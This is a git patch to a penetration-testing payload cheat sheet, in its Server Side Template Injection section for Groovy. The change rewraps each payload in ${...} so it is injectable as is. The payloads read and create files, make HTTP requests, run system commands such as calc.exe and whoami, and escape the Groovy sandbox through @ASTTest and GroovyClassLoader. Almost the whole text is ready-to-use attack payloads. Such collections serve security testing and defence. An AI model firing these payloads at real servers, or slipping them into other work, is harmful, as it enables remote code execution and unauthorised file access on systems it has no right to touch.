From 59cae2ddb4d2e428ecc1f41194734dc6412244bf Mon Sep 17 00:00:00 2001
From: 0x-nope <gianbaldi@gmail.com>
Date: Wed, 20 Apr 2022 09:42:58 +0200
Subject: [PATCH] Update README.md

---
 Server Side Template Injection/README.md | 27 +++++++++++-------------
 1 file changed, 12 insertions(+), 15 deletions(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 94f00d7..21f76c1 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -194,48 +194,45 @@ ${dwf.newInstance(ec,null)("id")}
 
 [Official website](https://groovy-lang.org/)
 
-
 ### Groovy - Basic injection
 
 Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection.
 
-
 ### Groovy - Read and create File
 
 ```groovy
-String x = new File('c:/windows/notepad.exe').text
-String x = new File('/path/to/file').getText('UTF-8')
-new File("C:\Temp\FileName.txt").createNewFile();
+${String x = new File('c:/windows/notepad.exe').text}
+${String x = new File('/path/to/file').getText('UTF-8')}
+${new File("C:\Temp\FileName.txt").createNewFile();}
 ```
 
 ### Groovy - HTTP request:
 
-
 ```groovy
-"http://www.google.com".toURL().text
-new URL("http://www.google.com").getText()
+${"http://www.google.com".toURL().text}
+${new URL("http://www.google.com").getText()}
 ```
 
 ### Groovy - Command Execution
 
 ```groovy
-"calc.exe".exec()
-"calc.exe".execute()
-this.evaluate("9*9") //(this is a Script)
-new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()
+${"calc.exe".exec()}
+${"calc.exe".execute()}
+${this.evaluate("9*9") //(this is a Script class)}
+${new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()}
 ```
 
 ### Groovy - Sandbox Bypass
 
 ```groovy
-@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
-def x
+${ @ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
+def x }
 ```
 
 or
 
 ```groovy
-new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
+${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") }
 ```
 
 ---